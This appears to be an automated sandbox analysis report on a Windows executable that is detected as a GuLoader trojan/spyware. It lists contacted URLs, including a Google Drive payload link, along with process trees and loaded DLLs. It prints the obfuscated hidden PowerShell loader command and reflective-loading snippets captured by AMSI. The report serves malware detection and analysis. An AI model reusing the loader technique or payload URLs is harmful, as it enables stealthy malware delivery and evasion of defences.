Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE
Source: msiexec.exe, 00000006.00000002.2980289658.000000000968F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2980289658.000000000968F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download
Source: msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download)J
Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.2995674935.00000000260FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002622C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.2995674935.0000000026207000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.0000000026232000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002630A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002608E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.2995674935.00000000260FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002622C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000006.00000002.2995674935.0000000026207000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.0000000026232000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002630A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002608E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comG
Source: msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comGGI
Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.2994091106.0000000025192000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443

Source: unknown	HTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49897 version: TLS 1.2

Source: C:\Users\user\Desktop\66776676676.exe

Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004051BA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\66776676676.exe

Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040322B

Source: C:\Users\user\Desktop\66776676676.exe	Code function: 0_2_004049F9	0_2_004049F9
Source: C:\Users\user\Desktop\66776676676.exe	Code function: 0_2_004064AE	0_2_004064AE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07CCCD86	1_2_07CCCD86
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272D278	6_2_0272D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02725362	6_2_02725362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272C1A2	6_2_0272C1A2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272C738	6_2_0272C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272C472	6_2_0272C472
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272CA08	6_2_0272CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272E988	6_2_0272E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02723E18	6_2_02723E18
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272CFAA	6_2_0272CFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272CCD8	6_2_0272CCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272F970	6_2_0272F970
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272E97A	6_2_0272E97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0272F961	6_2_0272F961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02729DE0	6_2_02729DE0

Source: 66776676676.exe

Static PE information: invalid certificate

Source: 66776676676.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/14@5/5

Source: C:\Users\user\Desktop\66776676676.exe

0_2_0040322B

Source: C:\Users\user\Desktop\66776676676.exe

Code function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404486

Source: C:\Users\user\Desktop\66776676676.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\66776676676.exe

File created: C:\Users\user\AppData\Roaming\china

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_03

Source: C:\Users\user\Desktop\66776676676.exe

File created: C:\Users\user\AppData\Local\Temp\nstF2DD.tmp

Jump to behavior

Source: 66776676676.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\66776676676.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\66776676676.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 66776676676.exe	ReversingLabs: Detection: 39%
Source: 66776676676.exe	Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\66776676676.exe

File read: C:\Users\user\Desktop\66776676676.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\66776676676.exe "C:\Users\user\Desktop\66776676676.exe"
Source: C:\Users\user\Desktop\66776676676.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\66776676676.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\66776676676.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\66776676676.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: justifikationssager.lnk.0.dr

LNK file: ..\..\..\..\..\Filial195.plo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 66776676676.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.2434001169.0000000007A59000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbb source: powershell.exe, 00000001.00000002.2437586696.0000000008B53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2437586696.0000000008B53000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2439189486.000000000A1E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Printmenu $Playboyen $Burres), (Repeteredes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Deltidsarbejderes164 = [AppDomain]::CurrentDomain.GetAssemblies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Clammed)), $Vdendesergittes).DefineDynamicModule($Oplserens, $false).DefineType($bandagerede, $Bordvine3, [System.MulticastDelegate])$

Suspicious powershell command line found

Source: C:\Users\user\Desktop\66776676676.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "
Source: C:\Users\user\Desktop\66776676676.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) "			Jump to behavior

